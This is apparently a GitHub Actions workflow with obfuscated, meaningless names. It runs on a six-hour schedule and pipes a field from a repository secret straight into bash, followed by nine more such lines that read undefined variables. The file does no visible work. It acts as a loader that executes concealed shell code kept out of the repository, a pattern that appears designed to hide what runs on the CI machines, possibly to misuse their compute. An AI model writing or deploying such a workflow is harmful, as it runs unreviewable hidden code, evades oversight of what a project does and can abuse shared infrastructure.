name: jinxinnian3421

on:
  workflow_dispatch:
  schedule:
    - cron: '49 4/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: jinxinnian3421
        env:
          nde3: ${{ secrets.nde3 }}
        run: |
          echo $nde3 | jq -r .t2 | /bin/bash
          echo $ovsgc08 | jq -r .nde47 | /bin/bash
          echo $syhp215 | jq -r .vk90 | /bin/bash
          echo $lxdyn9958 | jq -r .xsst84 | /bin/bash
          echo $j23417 | jq -r .alee1 | /bin/bash
          echo $agj7008 | jq -r .fuv28845 | /bin/bash
          echo $cb60557 | jq -r .qm43 | /bin/bash
          echo $mpvls100 | jq -r .d230 | /bin/bash
          echo $asn3 | jq -r .yfpyt14 | /bin/bash
          echo $dv15331 | jq -r .qmt3812 | /bin/bash

